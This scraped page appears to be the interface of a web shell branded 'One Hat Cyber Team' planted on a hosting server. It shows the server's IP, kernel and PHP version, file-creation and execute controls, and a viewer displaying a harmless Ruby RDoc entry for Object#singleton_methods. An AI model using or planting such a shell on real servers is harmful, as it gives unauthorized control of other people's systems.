⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.116
Server IP:
78.40.11.138
Server:
Linux tango.o2switch.net 4.18.0-553.30.1.lve.el8.x86_64 #1 SMP Tue Dec 3 01:21:19 UTC 2024 x86_64
Server Software:
Apache
PHP Version:
7.4.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
alt
/
ruby19
/
share
/
ri
/
1.9.1
/
system
/
Object
/
View File Name :
singleton_methods-i.ri
U:RDoc::AnyMethod[iI"singleton_methods:ETI"Object#singleton_methods;FF:publico:RDoc::Markup::Document:@parts[o:RDoc::Markup::Paragraph; [ I"GReturns an array of the names of singleton methods for <i>obj</i>.;FI"HIf the optional <i>all</i> parameter is true, the list will include;FI"/methods in modules included in <i>obj</i>.;FI">Only public and protected singleton methods are returned.;Fo:RDoc::Markup::BlankLine o:RDoc::Markup::Verbatim; [I"module Other ;FI" def three() end ;FI" end ;FI" ;FI"class Single ;FI" def Single.four() end ;FI" end ;FI" ;FI"a = Single.new ;FI" ;FI"def a.one() ;FI" end ;FI" ;FI"class << a ;FI" include Other ;FI" def two() ;FI" end ;FI" end ;FI" ;FI"-Single.singleton_methods #=> [:four] ;FI"2a.singleton_methods(false) #=> [:two, :one] ;FI"9a.singleton_methods #=> [:two, :one, :three];F: @file0I"2obj.singleton_methods(all=true) -> array ;F0[ I"(p1 = v1);FI" object.c;T